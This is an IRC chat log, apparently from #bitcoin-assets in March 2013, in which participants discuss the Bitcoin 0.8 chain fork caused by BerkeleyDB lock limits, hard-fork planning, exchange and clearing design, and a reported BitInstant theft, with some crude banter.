It could have been handled and implemented properly Mar 12 18:44:14 No amount of testing would have found the issue. Mar 12 18:44:38 @smickles: some people even claimed they sticked to an old version specially because of potential such issues with new versions when .8 wasn't the source of the problem. If they had switched it would have been an non-issue. We've reverted to accomodate the bug in .7 and not to leave people behind. Mar 12 18:45:33 .8 should be used, but we are holding back so poor people with shitty connections and shitty hardware can still be here Mar 12 18:46:01 mircea: I was referring to testing of .8 alone. I'm made an omission in it. I've been trying to correct myself for like the last few minutes =/ Mar 12 18:46:21 Namworld no! rabble! rabble! Mar 12 18:46:22 lol Mar 12 18:46:56 did someone say b00bies? Mar 12 18:47:00 booties. Mar 12 18:47:01 lol, you know people can run either version and change the size of blocks they can accept or mine Mar 12 18:47:10 MJR_ not accept. just mine. Mar 12 18:47:10 .. Mar 12 18:47:13 so good http://2mellomakes.bandcamp.com/album/chrono-jigga Mar 12 18:47:18 the problems is that other people accepted it Mar 12 18:47:20 and then it got mined in Mar 12 18:47:23 I hate it when I forget something in a sentence and I'm getting argued against for 10 minutes when I have the same point of view as the one arguing against me. Mar 12 18:47:27 so even if you didn't allow it, someone else did Mar 12 18:47:31 and then your client chokes Mar 12 18:47:47 and you get stuck and don't get any new blocks Mar 12 18:47:49 Namworld does it happen often ? Mar 12 18:48:13 mircea_popescu: Namworld is usually arguing with himself. Mar 12 18:48:30 That's new. I don't recall that. Mar 12 18:48:43 No. Maybe every month or the other. Mar 12 18:48:51 They have identified it as .BDB has a limit and can be broken. .8 does not have a limit and seems fine. Lets move back to the broken Mar 12 18:48:52 i enjoy arguing with him mostly because he seems to go about things in a totally different way than anyone else Mar 12 18:48:53 When typing fast. Mar 12 18:49:03 which is a great way to become a laughingstock, sure, but also a great way to find obscure bugs. Mar 12 18:49:59 Actually I find you go about things in a different way than anyone else... Mar 12 18:50:03 of course i do. Mar 12 18:50:22 can't you change your code in .7 to accept larger blocks? Mar 12 18:50:28 no Mar 12 18:50:30 its bdb Mar 12 18:50:36 .7 can already accept larger blocks Mar 12 18:50:41 bdb can't handle the locking Mar 12 18:50:45 too many tx in the block Mar 12 18:50:45 Almost all misunderstandings on Bitcoin IRC are with you. I usually go about quite well with almost everyone else. Mar 12 18:50:59 Namworld almost everyone else doesn't have much to say. Mar 12 18:51:08 ah I see Mar 12 18:51:12 I'm glad I'm not almost everyone else Mar 12 18:51:21 I have a shitton to say Mar 12 18:51:25 lol Mar 12 18:51:31 imsaguy should i grep log for imsaguy ? :D Mar 12 18:51:50 don't forget [\\\] Mar 12 18:51:51 The problem glaring from this, now a obvious major problem is here and can be exploited again. Mar 12 18:51:53 and pirateat40 Mar 12 18:51:55 oops Mar 12 18:52:00 just [\\\] Mar 12 18:52:05 has anyone ever said "bitcoin-assets is great but I just wish it had as much drama as bitcointalk.com" Mar 12 18:52:25 kik Mar 12 18:52:34 MJR_ it has moar. Mar 12 18:52:36 I think you are very literal on what sentences mean and interpret as little as possible. You avoid making too many inferences during a conversation so even small omissions can result in misunderstandings. Mar 12 18:52:38 MJR_: they didn't have to Mar 12 18:52:59 Namworld certainly. this way misunderstandings are found early. Mar 12 18:53:06 at least ideally. Mar 12 18:53:14 ;;seen usagi Mar 12 18:53:15 usagi was last seen in #bitcoin-assets 6 days, 23 hours, 17 minutes, and 59 seconds ago: do it Mar 12 18:53:19 aww Mar 12 18:53:27 does he still owe people coins? Mar 12 18:53:32 she/it* Mar 12 18:53:37 imsaguy i think he's doing something with silver atm Mar 12 18:53:37 If it was a written text, I might make less omissions. When chatting tho, I type fast and usually omit things. Mar 12 18:53:54 uh oh.. Mar 12 18:53:57 actually... what if usagi and eskimo bob joined forces Mar 12 18:54:03 and created the world's first Mar 12 18:54:07 silver easybake oven ? Mar 12 18:54:23 sounds like a methlab waiting to happen Mar 12 18:54:32 when they get older. Mar 12 18:54:44 how old is bob? Mar 12 18:55:05 bob? The eskimo? Mar 12 18:55:20 put both of their ideas on how to make money together? 1+1=still is 0 Mar 12 18:55:24 should be like twentysomething i would guess Mar 12 18:55:29 Only bob I know around these parts. Mar 12 18:56:10 https://bitcointalk.org/index.php?topic=152246.msg1615740#msg1615740 Mar 12 18:56:15 some of the funniest shit i read all day. Mar 12 18:56:40 this seems to be the contemporary brain disease, people reading stuff they don't understand here and there, mashing it into a sort of compound Mar 12 18:56:51 bitcoin is the worst Mar 12 18:58:09 I think being heavily dependant on miners is actually what Satoshi wanted... miners vote with their hashing power... That's exactly how the system is supposed to work. Mar 12 18:58:24 yeah. Mar 12 18:58:46 I like Death and Taxes response Mar 12 18:58:51 and devs can consult with mining pool when changing limits and send a warning so everyone upgrades directly to the client, should they want to make a change to allow scaling. Mar 12 18:58:58 they will still need to hard fork us again at some point, no? Mar 12 18:59:16 yes, they'll need to. Mar 12 18:59:41 so does that not give malicious people a specific time in the future to plan for? Mar 12 18:59:50 But with proper warning and support from the community for the change, only the few not switching are left behind. Mar 12 18:59:58 ThickAsThieves yes, it does. Mar 12 19:00:09 it really is a catastrophe, strategically Mar 12 19:00:15 this time they werent prepared Mar 12 19:00:19 next time they will be Mar 12 19:00:25 just the puppy eyed idiots don't quite get what happened so raw raw we love devteam Mar 12 19:00:35 what kind of malicious stuff might there be? Mar 12 19:00:44 planning to double spend? Mar 12 19:00:45 Namworld you're proceeding on the wrong path. Mar 12 19:00:55 that's not how this works, "o, what bad stuff could happen?" Mar 12 19:01:23 Well, first of all they need to plan the change sooner than later Mar 12 19:01:28 No, I mean malicious stuff from knowing ahead of time about a fork. Mar 12 19:01:35 Other than double-spend attacks Mar 12 19:01:57 how would i know ? Mar 12 19:02:02 we'll find out if we're unfortunate enough. Mar 12 19:02:06 But really, merchants/miners can plan ahead if they know. It's better if it's known in advance than not. Mar 12 19:02:08 even if we don't know that doesn't make the issue ok. Mar 12 19:02:33 ra ra go devbs Mar 12 19:02:34 knowing in advance there will have to be a hard fork is a weakness of the system. Mar 12 19:02:40 it may be reduced rto almost no cost, maybe Mar 12 19:02:41 centralize us on a single buggy broken blatform Mar 12 19:02:43 but it still costs > 0 Mar 12 19:03:02 and incidentally, i wonder what OTHER exploits are there for berkley Mar 12 19:03:11 Well there will be forks... Mar 12 19:03:12 that were illustrated by this but aren't limited to lage blocks Mar 12 19:03:12 and for people who have trouble keeping up with the technical times, the costs are going to be higher next time Mar 12 19:03:15 [BTCTC] [PAJKA.BOND] 20 @ 0.1 = 2 BTC [+] Mar 12 19:03:25 That's pretty much unavoidable. Mar 12 19:03:27 benkay the top pool is pretty much bankrupt now, is it ? Mar 12 19:03:34 courtesy of idiotteam doublewhammy-ing them Mar 12 19:03:49 market dominance is never an indicator of technical competence Mar 12 19:03:57 be that as it may. Mar 12 19:04:00 look at MtGox... Mar 12 19:04:07 good example Mar 12 19:04:10 good point Mar 12 19:04:12 ;;goxlag Mar 12 19:04:13 2.062621 seconds Mar 12 19:04:17 heh/. Mar 12 19:04:18 $mpexlag Mar 12 19:04:20 mircea_popescu: 0.116768121719 seconds Mar 12 19:04:22 win. Mar 12 19:04:32 o boy will i be having fun with this. Mar 12 19:04:35 what is mpexlag calculating? Mar 12 19:04:41 MtGox is pretty much constently lagging. Mar 12 19:04:47 the lag to talk to mpex, through a remote and a local proxy Mar 12 19:04:59 to the order-parsing system? Mar 12 19:05:17 benkay the bot just measures the proxy response Mar 12 19:05:23 so i know they me seem ignorant, but just thinking out loud, is there not a way to make the bitcoin software part of the blockchain itself? Mar 12 19:05:27 so to web server. Mar 12 19:05:33 to allow propagation of new versions? Mar 12 19:05:34 it takes .11 seconds for an order to go from bot to remote proxy -> to local proxy -> to trade engine and back Mar 12 19:05:47 oh okay Mar 12 19:06:06 no that's not correct. Mar 12 19:06:14 it takes .11 seconds for an order to go from bot to remote proxy -> to local proxy and back Mar 12 19:06:33 you can't measure the trade engine from outside Mar 12 19:06:54 what kind of volume would your trade engine have to see before it started lagging? Mar 12 19:07:16 benkay i've seen > 10 orders per second irl Mar 12 19:07:34 i've seen > 100 on testnet with the future config Mar 12 19:07:34 *grins* Mar 12 19:07:58 assuming you don't mean btc testnet? Mar 12 19:08:02 (this has to be sustained at that level for an hour or so for things to start feeling it) Mar 12 19:08:15 benkay no, my own. btc don't enter into it Mar 12 19:08:28 benkay: i could have it place an order, to test, but the problem would be cancelling that order later Mar 12 19:08:30 *nods* Mar 12 19:08:30 mpex could trade on beenz if i wanted to, it's completely btc agnostic. Mar 12 19:08:41 i get it man i get it Mar 12 19:08:50 smickles actually the expansion on that is Mar 12 19:08:52 namespace conflict Mar 12 19:08:57 just resolving Mar 12 19:09:05 mircea_popescu: would a better measure be sending a bunk order? Mar 12 19:09:06 once i get the rest online, can you measure the lag for the entire $proxies list ? Mar 12 19:09:15 smickles i think it's a fine measure as it is really. Mar 12 19:09:19 i suppose i could Mar 12 19:09:52 the way mpex works you get the trade engine lag printed rioght on each stat Mar 12 19:18:29 any thoughts on somehow tying the bitcoin software to the blockchain itself? dumb idea? Mar 12 19:18:48 yes Mar 12 19:19:02 ThickAsThieves: what purpose would it serve? Mar 12 19:19:10 propgation of new versions Mar 12 19:19:11 forced Mar 12 19:19:34 Would be catastrophic... no more voting on what changes you want Mar 12 19:19:47 Basically, someone controls Bitcoin Mar 12 19:19:53 how is that different Mar 12 19:20:17 yeah, right now, users 'vote', miners 'vote' Mar 12 19:20:20 Namworld: not true Mar 12 19:20:26 you can always compile your own bitcoin software Mar 12 19:20:44 i know *I* can't contol what devs and pools do Mar 12 19:20:49 voted or not Mar 12 19:20:57 you vote with your hash Mar 12 19:21:00 ThickAsThieves: but you don't have to go along with them Mar 12 19:21:01 you vote with what you use Mar 12 19:21:10 Yeah. But almost the same if software upgrade is forced through the blockchain itself. Not sure how that could even work tho Mar 12 19:21:19 well for example Mar 12 19:21:19 Anyway, I'm out. Mar 12 19:21:24 you take the bitcoin.org reference software Mar 12 19:21:37 and they say 'this version isn't good after block X' Mar 12 19:21:44 you've just put an expiration date on the software Mar 12 19:21:59 I'm not advocating they do this Mar 12 19:22:00 where's the statics on what version people are running, i think there are a bunch still on .3 Mar 12 19:22:08 Luke-Jr has a graph page Mar 12 19:22:14 but I don't know how often it updates Mar 12 19:22:21 it's realtime Mar 12 19:22:27 its just lame that people can be left in the void Mar 12 19:22:27 url? Mar 12 19:22:36 http://luke.dashjr.org/programs/bitcoin/files/charts/branches.html Mar 12 19:22:38 ThickAsThieves: Its on the of problems with Microsoft Mar 12 19:22:48 they keep trying to support the morons that refuse to update Mar 12 19:23:08 if they cut people off cold turkey, they could cut a lot of hackjobs added to make old software work with the new stuff Mar 12 19:23:11 they have an obligation to their product Mar 12 19:23:13 Luke-Jr: updated reasonably well? Mar 12 19:23:25 [17:22:20] it's realtime Mar 12 19:23:26 smickles: he said realtime Mar 12 19:23:33 lol Mar 12 19:23:36 oh, i should read Mar 12 19:23:42 sry Luke-Jr Mar 12 19:23:45 is realtime reasonably well? Mar 12 19:23:49 NO! Mar 12 19:23:52 MOAR! Mar 12 19:24:05 [13-03-12 17:24:00] 1784/529458 available (520270 tried in 61095s, 9164 new, 24 active), 177 banned; 1692328 DNS requests, 112840 db queries Mar 12 19:24:07 ThickAsThieves: look, about 2.45% of the network is using .3 still Mar 12 19:24:07 Luke-Jr: could you make one that's futuretime? Mar 12 19:24:24 imsaguy: draw a big circle and write 1.0 in the middle? Mar 12 19:24:33 yay! Mar 12 19:24:35 no more beta Mar 12 19:24:39 <.< Mar 12 19:24:40 >.> Mar 12 19:24:48 betacoin Mar 12 19:25:14 imsaguy: compile your own from .8 but modify it to say that it is 1.0 Mar 12 19:25:15 :D Mar 12 19:25:35 i'm just stuck on meta thoughts lately, i think its lack of sleep Mar 12 19:25:47 .5 just gets no love Mar 12 19:26:08 make bitbets about bitbet! put bitcoin software on blockchain! Mar 12 19:28:17 lol smickles Mar 12 19:28:27 I am one of the unidentifieds Mar 12 19:29:22 we're all martian immigrants http://www.theverge.com/2013/3/12/4094534/nasa-curiosity-rover-discovers-ancient-mars-could-have Mar 12 19:37:00 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Mar 12 19:42:44 ThickAsThieves: *picture of xibit holding a picture of xibit* Mar 12 19:47:59 while looking in the mirror with a mirror behind him Mar 12 19:52:11 is the chain back to normal? Mar 12 19:52:21 anyone having any txes hanging in the air? Mar 12 19:52:56 everything is legit for me in all accounts Mar 12 19:54:40 kakobrekla should be fine. Mar 12 19:54:52 hm Mar 12 19:54:54 until someone figures out how to trigger the berkley bug with a smaller block Mar 12 19:54:58 i have some oldish txes Mar 12 19:55:04 such as including 10k 160 byte txs Mar 12 19:55:05 still no confirm Mar 12 19:55:13 kinda worrying Mar 12 19:55:37 ;;ticker Mar 12 19:55:37 BTCUSD ticker | Best bid: 45.01770, Best ask: 45.01771, Bid-ask spread: 0.00001, Last trade: 45.01771, 24 hour volume: 171261.27579910, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 43.77026 Mar 12 19:55:40 back to 45! Mar 12 19:56:00 a hard fork bounce :) Mar 12 19:56:09 btcguild at 13k Mar 12 19:57:07 ThickAsThieves sorry ? Mar 12 19:57:29 any btct.co admins online? Mar 12 19:57:57 burnside ^ Mar 12 19:58:11 sry, https://bitcointalk.org/index.php?topic=49417.msg1616550#msg1616550 Mar 12 20:03:14 [BTCTC] [ASICMINER-PT] 10 @ 0.7 = 7 BTC [-] Mar 12 20:07:19 https://bitcointalk.org/index.php?topic=152027.msg1616671#msg1616671 Mar 12 20:07:26 "o, it was a bug in berkely db" Mar 12 20:07:28 fucking idiots. Mar 12 20:12:13 ;;seen Josh_Rossi Mar 12 20:12:13 Josh_Rossi was last seen in #bitcoin-assets 1 day, 16 hours, 7 minutes, and 19 seconds ago: pretty sweet Mar 12 20:12:27 that is cool Mar 12 20:17:18 today I downloaded .7 and have been patiently waiting for my blockchain to download, im not sure if I will continue refunds or just buy a big crack rock and smoke it in a cave some where but I am totally offended by this scammer tag Mar 12 20:18:44 you got a scammer tag ?! Mar 12 20:18:51 tom Mar 12 20:19:01 lol totally offended okay. Mar 12 20:19:04 https://bitcointalk.org/index.php?topic=143496.msg1614693#msg1614693 Mar 12 20:19:18 so he couldn't do refunds all through february because the devs borked transition to .9 Mar 12 20:19:26 yeah Mar 12 20:19:26 .8*. in march. Mar 12 20:20:20 "if I was a scammer I could be living it up easy some place warm instead of braving the same upstate new york winters I have been for 30+ years" Mar 12 20:20:21 well... let's just hope gavin sends him the correct lists then Mar 12 20:21:05 "If anyone has any idea how I can buy a large amount of bitcoins please message me. The largest amount I can buy from bitinstant is $500 worth ive looked and looked and its near impossible to make a large bitcoin purchase anywhere." Mar 12 20:21:19 oh i see yeah Mar 12 20:22:32 to everyone else .... PEACE AND LOVE Mar 12 20:22:34 lol Mar 12 20:23:06 so here's the lol of today : Mar 12 20:23:24 devs say berkeley is broken. it is fine. they forgot to configure it. Mar 12 20:23:41 yeah we know Mar 12 20:23:41 this is possibly the worst case of "hi i am calling to report a bug" bungled tech support ever. Mar 12 20:23:48 the college? Mar 12 20:23:54 jk Mar 12 20:23:57 pigeons i fear it'll take me a little to digest this one Mar 12 20:24:34 you can configure it to use more locks, so far that seems to work just uses a lot more ram but works Mar 12 20:25:32 the proof of something awful's general cluelessness/irrelevance is the low level mock articles they're pushing out. Mar 12 20:25:40 there's material here to scathe. Mar 12 20:26:52 yeah BDB has been a thorn in dev's side for a decade. but sounds like this time they forgot about a landmine they already stepped on once before. Mar 12 20:27:10 for people into sdice graphs : https://bitcointalk.org/index.php?topic=80312.msg1614936#msg1614936 Mar 12 20:27:39 mod6 bring me up to speed, what exactly is the objection ? it is widely deployed and consequently well debugged by now Mar 12 20:27:50 BTC needs a CVE or something or some sort of post mortum. Mar 12 20:28:03 [HAVELOCK] [SDICE] 5 @ 0.57575758 = 2.8788 BTC [-] Mar 12 20:29:13 http://i.imgur.com/HzcprPZ.png Mar 12 20:29:18 this particularly is illustrative. Mar 12 20:30:35 mircea_popescu: its not really an objection. Mar 12 20:30:50 its just something to be cautious of Mar 12 20:30:58 ya but i mean, why ? Mar 12 20:31:07 it escapes me dude Mar 12 20:31:11 its been too long Mar 12 20:31:12 lol kk Mar 12 20:31:15 so many problems over the years Mar 12 20:31:21 just trying to get smarter over here :p Mar 12 20:31:25 i couldn't possibly remember them all Mar 12 20:31:32 im just depressed about this shit Mar 12 20:31:46 i imagine a number of people are. Mar 12 20:33:25 i was thinking about the gox issue... Mar 12 20:33:50 and perhaps what we need is something like rootservers for fiat->btc exchanges Mar 12 20:34:15 what are those ? Mar 12 20:35:31 dns has root servers worldwide to resolve requests. thinking that maybe btc could do well to have like 10-13 worldwide exchanges all independant of eachother. Mar 12 20:35:34 like DNS ? Mar 12 20:35:37 not that all the code should be the same. Mar 12 20:36:00 but also...those root servers have children Mar 12 20:36:06 kakobrekla wants something like the way fx is setup Mar 12 20:36:08 root servers don't keep the same code either, not exactly anyway, this way it prevents a simutaious attack against all Mar 12 20:36:24 mod6 it would be good to have many exchanges, but there's problems with getting that to work in p[ractice Mar 12 20:36:37 because exchanges concentrate liquidity and people chase liquidity Mar 12 20:36:43 this will help distrbute the load of exchange, and then btc wont have 1 place to look for price signals. Mar 12 20:36:47 well, one thing is that instant settlement is going to be harder and harder to scale Mar 12 20:37:01 personally i think the solution is fixing, but Mar 12 20:37:13 few people involved actually have enough finance knowledge to get it going yet. Mar 12 20:37:23 true Mar 12 20:37:24 fix protocol? Mar 12 20:37:27 gox mus die Mar 12 20:37:30 fix is shit Mar 12 20:38:03 MJR_ no gais. fixing. Mar 12 20:38:36 you lost me Mar 12 20:38:37 Mar 11 09:18:00 ok, it's like this. suppose the three main dealers are A, B and C. Mar 12 20:38:37 Mar 11 09:18:13 chair X calls the meeting. X proposes price, say 47.5 Mar 12 20:38:37 Mar 11 09:18:27 a, b and c go through their books, see what customers want, see what they want on their own account Mar 12 20:38:37 Mar 11 09:18:45 then they say. a buys 50k usd. b sells 25k usd. c sells 70k usd. Mar 12 20:38:37 Mar 11 09:18:52 25 + 70 > 50k so its not fixed Mar 12 20:38:37 Mar 11 09:18:58 x has to call a lower price now Mar 12 20:38:37 Mar 11 09:19:00 ah that kind of meeting you mean Mar 12 20:38:37 Mar 11 09:19:01 say 47.3 Mar 12 20:38:37 Mar 11 09:19:08 now a b and c review their books Mar 12 20:38:37 Mar 11 09:19:14 think i just need to add some sleep time.... Mar 12 20:38:37 Mar 11 09:19:14 42 12 40 Mar 12 20:38:37 Mar 11 09:19:15 etc Mar 12 20:38:37 Mar 11 09:19:27 this process is called fixing, it's widely used to obtain a price. Mar 12 20:38:40 and fixing this block size thing is kinda crazy. its like you know when you get a UDP request to your DNS server and the reply from the Zone is > than the max size of UDP, it rolls over to tcp Mar 12 20:39:40 well, again I think that could happen on a larger scale... Mar 12 20:39:40 credit lines between exchanges to allow cross exchange arb would be an important start... Mar 12 20:39:48 yes exactly Mar 12 20:39:49 i don't think im smart enough for this stuff. Mar 12 20:40:10 pgp: again instant settlement is not sustainable Mar 12 20:40:15 the first important step, realizing that. Mar 12 20:40:28 this would also require something akin to DTCC (depositiory trust clearing corp) where every exchange is a member and keeps money on deposit... Mar 12 20:40:30 or even wise...since cold storage =\= instant Mar 12 20:41:01 pgp that could easily be implemented using the mpex push for isntance Mar 12 20:41:13 or independently, but pgp is a good solution to keep it safe. Mar 12 20:41:33 indeed Mar 12 20:41:35 problem is every exchange wants to act as if in a vacuum, because Mar 12 20:41:44 they perceive they lack any distinguishing features Mar 12 20:41:56 the problem is exchange ops are retarded Mar 12 20:42:01 kakobrekla basically. Mar 12 20:42:08 the problem with bitcoin in general is the userbase is dumb. Mar 12 20:42:25 well not educated financially Mar 12 20:42:26 devteam, miners, pool ops, exchange ops, everyone is... you know... draftees Mar 12 20:42:30 people picked off the street Mar 12 20:42:31 tech savvy Mar 12 20:43:03 you would be surprised how many financial wizards have trouble using email Mar 12 20:43:05 :( Mar 12 20:43:13 yes - with the exception of bitfloor, it doesn't seem that these exchanges are run by anyone familiar with how "real" exchanges (and clearing operations) actually work... Mar 12 20:43:22 bitlol Mar 12 20:43:29 i got trolled so hard by my gf for this shit yesterday Mar 12 20:43:30 so you need people who are tech AND finance savvy Mar 12 20:43:30 guy got fucked a comple of times no? Mar 12 20:43:37 he did Mar 12 20:43:44 we're the laughing stock Mar 12 20:43:46 over confidend Mar 12 20:43:50 nt Mar 12 20:43:57 pgp bitfloor, the guys currently owinfg like 900x what they'll ever make ? Mar 12 20:44:08 well...last I checked there was only one exchange that hasn't been hacked Mar 12 20:44:10 so what is the "proper" way to run an exchange? where can I read about this? Mar 12 20:44:18 The book of Kako Mar 12 20:44:27 Kako accually means how Mar 12 20:44:30 pizzaman1337 this ain't knitting we're discussiong here man. Mar 12 20:44:30 so it makes sense. Mar 12 20:44:57 well, paranoia does not an efficient market make Mar 12 20:44:58 lol mp Mar 12 20:44:58 you read about it in school, which costs dough Mar 12 20:45:05 anywho brb Mar 12 20:45:23 schoool... that's what the internet is for Mar 12 20:45:38 pizzaman1337 no but srsly, this is the sort of thing people pay in the 100's of k's for, Mar 12 20:45:50 it's not exactly "go to wikipedia" sort of thing Mar 12 20:46:06 it is pretty sad that the biggest exchange can't handle orders in less than 5 min Mar 12 20:46:09 well, there must be some info on it somewhere that I could get access too Mar 12 20:46:13 MJR_ mpex doesn't do fiat tho, so it's kinda moot for this problem Mar 12 20:46:20 s/5min/30min Mar 12 20:46:33 don't know of anyone getting hacked for fiat Mar 12 20:46:42 heh Mar 12 20:46:46 no? Mar 12 20:46:46 what's sad is that they take ~5k a month in hardware costs to process 8k trades in 30 minutes Mar 12 20:46:50 look harder Mar 12 20:46:59 if we scale this liniarly we discover it'd cost more than it's worth to have ti trade Mar 12 20:47:07 I meant the bitcoin exchanges Mar 12 20:47:12 yes Mar 12 20:47:13 for starters, most all exchanges today pay you to add liquidity to their book - the so called "maker-taker" fee model. Mar 12 20:47:38 exactly what pgp said Mar 12 20:48:12 pgp the reason is they're mixing bizdev with the fee schedule. Mar 12 20:48:37 mjr_ where have you been? bitininstant lost usd a few days ago Mar 12 20:48:45 what about bitcoinica? what about every single one? Mar 12 20:48:48 ... Mar 12 20:49:00 they stole usd from the servers Mar 12 20:49:07 ? Mar 12 20:49:11 yes Mar 12 20:49:14 moreover, because like asset exchanges belong to the same "clearing clubs", they can route orders to one another to ensure "best execution" for their customers (while, of course, charging for that convenience)... Mar 12 20:49:14 yeah ? Mar 12 20:50:07 pigeons wait. didn't bitinstant lose the BTC on vircurex ? Mar 12 20:50:07 front page hackers used DNS to steal 12000 worth of BITCOINS Mar 12 20:50:18 mircea_popescu: usd Mar 12 20:50:23 um Mar 12 20:50:38 usure ? cause i wrote about this and iirc shrem was saying btc Mar 12 20:50:39 via paypal from vircurex Mar 12 20:51:00 i'll add it to research list cause wtf. Mar 12 20:51:26 they weren't using two factor auth with that exchange... Mar 12 20:51:35 http://blog.bitinstant.com/blog/2013/3/4/events-of-friday-bitinstant-back-online.html Mar 12 20:51:45 "Overall, due to major choke points and redundancies in our system, the hacker was only able to walk away with $12,480 USD in BTC, and send them in 3 installments of 333 BTC to bitcoin addresses." Mar 12 20:51:45 sorry i meant virwox Mar 12 20:51:51 you can lead a horse to water Mar 12 20:53:28 they listed the loss in dollars, but you can't send cash over a wire Mar 12 20:54:03 BTC was stolen Mar 12 20:55:45 anyway I think there is a ton of room for competition to mt gox Mar 12 20:56:20 yeah Mar 12 20:56:34 there needs to be at least 3 Mar 12 20:56:49 all independant of eachother that aren't scams Mar 12 20:56:50 but even better opportunity for someone to route flow between exchanges Mar 12 20:57:10 lol, not being scams is key Mar 12 20:57:12 and security Mar 12 20:57:22 if they were modeled after mpex, that'd be a start Mar 12 20:57:46 I really think a gpg based order system would be nice Mar 12 20:57:55 not the SAME code, but similar to avoid attacks upon a weakness found in one Mar 12 20:58:09 similar to rootservers Mar 12 20:58:13 I agree Mar 12 20:58:15 mod6 one of the key reasons why i keep the code closed. Mar 12 20:58:25 *nod* Mar 12 20:58:28 people would just mindlessly replicate it (see bitfinex) then we'll be well fucked Mar 12 20:58:34 but also...I really think node and branch will be needed Mar 12 20:58:55 and really... the UDP (TCP when needed) is a model that the guys should be looking at to solve this blocksize issue Mar 12 20:59:02 in a sense mpex is constructed exactly opposite of how bitcoin is constructed. Mar 12 20:59:07 any thoughts on that? anyone know what I'm referring to? Mar 12 20:59:11 keep the specification open and the implementation proprietary Mar 12 20:59:20 versus the keep the specification equal to the unreadable codebase. Mar 12 20:59:21 know exactly what you are talking about Mar 12 20:59:51 you access mpex through open standards Mar 12 20:59:53 I wrote a program to monitor how often we need to fail over to TCp for our data feeds Mar 12 20:59:58 how it works is not your concern Mar 12 21:00:21 mod6 originally i thought it was udp p2p Mar 12 21:00:22 unicorns are definitely walking in hamster wheels though Mar 12 21:00:23 http://zgp.org/pipermail/p2p-hackers/2004-December/002221.html Mar 12 21:00:27 it is after all 2004s stuff Mar 12 21:00:30 but apparently... Mar 12 21:00:47 I think it's multicast tcp? Mar 12 21:01:03 MJR_ im not even sure at this point. Mar 12 21:02:17 I think bitcoin-assets is the bleeding edge of the bleeding edge Mar 12 21:03:06 mod6, how would UDP help in blocksize issuie? Mar 12 21:03:10 when you think that people on coinbase are probably still in the innovators (before 18%) stage...wow Mar 12 21:03:55 really? its second to -otc in stupid Mar 12 21:04:06 all your fancy exchange routing will be done via ripple Mar 12 21:04:31 I can't remember your exact quote mircea_popescu but something like "if you want to use crypto currency but don't understand cryptography..." Mar 12 21:04:31 jurov: not UDP Mar 12 21:04:52 MJR_ something like that. Mar 12 21:05:17 pigeons why isn't it now ? Mar 12 21:05:25 jurov: we can learn a thing or two, perhaps, about how DNS solves the issue. UDP is meant to be fast, and arbitrarily large since forward/reverse zones can contain an large amount of entries. Mar 12 21:05:25 [BTCTC] [B.YABMC] 1 @ 0.00755 BTC [+] Mar 12 21:05:43 mod6 of course, the blockszie issue wasn't hitting the transport layer Mar 12 21:05:48 I think a central clearing corp, that only needs to transfer the diff between exchanges will be the best way Mar 12 21:06:01 MJR_ except on the day it gets attacked. Mar 12 21:06:06 i don't even mean government necessarily. Mar 12 21:06:12 look what happened in ny when the clearing corp got flooded Mar 12 21:06:16 but when the size of UDP gets over 65,535 bytes (need to double check), it simply converts it to TCP and sends it that way. something can be learned from this, nothing more. Mar 12 21:06:17 mircea_popescu: cause people are transitioning from doing it via the private standalone django app to the new ripple but it is being done now Mar 12 21:06:30 im not saying about the transport, or anything Mar 12 21:06:39 im simply saying, look at how this problem was solved Mar 12 21:06:44 true Mar 12 21:06:45 pigeons on superficial analysis ripple seems just the place where the curerent bitcoindev rats will sucrry to Mar 12 21:06:53 once they get their altar broken for reals. Mar 12 21:07:37 yes perhaps, but currency liquidity flowed throug it before and will continue too, Mar 12 21:07:44 i dunno, i guess i'd have to spend some time in there. and the client needs to be combed through Mar 12 21:07:48 and hacked Mar 12 21:07:57 mod6, maximal packet size (or MTU) is hard fact baked into ethernet from the beginning, not some broker earlier implementation Mar 12 21:08:03 slice and dice shit out of there that needs to be replaced. Mar 12 21:08:03 *broken Mar 12 21:08:06 mod6 actually once you're done with the iphone app, a very good use of someone's time is to go through the codebase and summarize it Mar 12 21:08:16 that;s usually a good step towards specification. Mar 12 21:08:36 mircea_popescu: what iphone app? Mar 12 21:08:38 i never wanted to touch bitcoin's client or anything else because the #bitcoin-dev is filled with pompus retards Mar 12 21:08:48 so i'll just my retard ass out of there Mar 12 21:08:50 MJR_ the bitotter thing he's working on Mar 12 21:08:58 ah cool Mar 12 21:09:13 mod6 good for ya. i did touch it and it didn't hurt. Mar 12 21:09:27 but maybe i'm just crazy, going into anything Mar 12 21:09:43 without such considerations Mar 12 21:09:59 i'd love to take the time to audit that shit, but who wants to fight with LukeJr and the others? Mar 12 21:10:05 aint noone got time for that Mar 12 21:10:09 mod6 i don't know who's listening to them. Mar 12 21:10:21 a summary of the codebase is definitely useful. Mar 12 21:11:04 oh i read that "in summary the coinbase is defenetly useful" and got a heart attack almost Mar 12 21:11:23 lol Mar 12 21:11:23 need more coffee. Mar 12 21:11:51 ain't no one got time for that indeed Mar 12 21:12:32 yeah. its way out of hand Mar 12 21:12:39 http://micropoll.com/t/LE9JQZQhrI Mar 12 21:12:46 i'm doing much better in the poll today Mar 12 21:12:55 mod6 i'm not interested in arguing. if i had time, i'll do a fork with some very useful function and wait for them to come Mar 12 21:13:04 ^^^ Mar 12 21:13:08 like my two independent wallets prototype: https://github.com/jurov/bitcoin Mar 12 21:13:28 nice dude Mar 12 21:13:57 any reason CPP? Mar 12 21:14:20 cuz it's fork of bitcoind Mar 12 21:14:24 or you just cloned and went forward? Mar 12 21:14:25 ok Mar 12 21:14:52 wasn't hard... couldn't understand why that function isn't exposed already Mar 12 21:14:56 yeah, its WAY too large imho Mar 12 21:15:03 prolly they don't have time to test properly xD Mar 12 21:15:26 thats obvious to everyone in the world who pays attention Mar 12 21:15:34 they should back away after this Mar 12 21:16:30 well, they preferred to entagle themselves in multisig txs at the time Mar 12 21:16:51 incidentally, they still don't have sane interface, too Mar 12 21:17:06 pretty much everything about it is kludge. Mar 12 21:17:17 i am still steaming over the fact that i can't create abitrary size txs Mar 12 21:18:25 let's get to budapest for buncha asics and outmine them http://primeasic.com/order.php Mar 12 21:18:48 lmao DUE TO OVERWHELMING REQUESTS we had to remove PayPal & Local Pickup options. Mar 12 21:18:50 that thing stil around ?! Mar 12 21:18:57 lolok Mar 12 21:19:00 btc only rite ? Mar 12 21:19:29 yes, only nonreversable nonpersonal means. fyr maximum security. Mar 12 21:20:32 due to overwhelming miner vote. Mar 12 21:24:58 for starters who does this? Dbc* pcursor = db.GetCursor(); Mar 12 21:25:45 i just hate looking at the 